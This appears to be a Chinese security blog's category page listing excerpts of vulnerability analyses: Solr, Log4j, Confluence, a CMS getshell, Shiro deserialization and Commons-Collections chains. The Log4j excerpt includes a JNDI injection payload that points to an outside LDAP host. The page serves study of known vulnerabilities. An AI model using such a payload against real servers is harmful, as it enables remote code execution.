分类: vuln

6 篇文章

记一次失败的CVE-2021-44548分析
前言 之前在zsxq看到有师傅发solr的洞:CVE-2021-44548,今天看了一下,但是好像危害不大,不过还是以学习为主看一波 描述: Apache Solr 的 DataImportHandler 中的一个不正确的输入验证漏洞允许攻击者提供 Windows UNC 路径,导致从 Solr 主机向网络上的另一台主机进行 SMB 网络调用。 h…
log4j rce
log4j rce 影响版本: 2.0-beta9 到 2.14.1 修复版本: 2.15.0-rc2 payload: ${jndi:ldap://9zx4xu.dnslog.cn:1389/Exp} 分析: 先来看原来没修的 2.14.1 import org.apache.logging.log4j.LogManager; import or…
Confluence 漏洞分析
CVE-2019-3396 https://jira.atlassian.com/browse/CONFSERVER-57974 影响版本为: version < 6.6.12 6.7.0 <= version < 6.12.3 6.13.0 <= version < 6.13.3 6.14.0 <= versi…
讯睿cms前台getshell
目录结构,index.php包含Fcms\init.php做入口,核心controller代码在dayrui中 路由为?s=控制器文件夹&c=具体控制器&m=方法,如?s=member&c=login&s=index 直接到漏洞函数,首先通过get传入app name module参数 这里进入294行的else中,…
shiro550反序列化分析踩坑
环境搭建 github上下载源码,配上tomcat运行shiro-web shiro-root pom.xml <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl</artifactId> <!-- 这里需要将…
cc链1-8分析
URLDNS 先看波poc package ysoserial; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import j…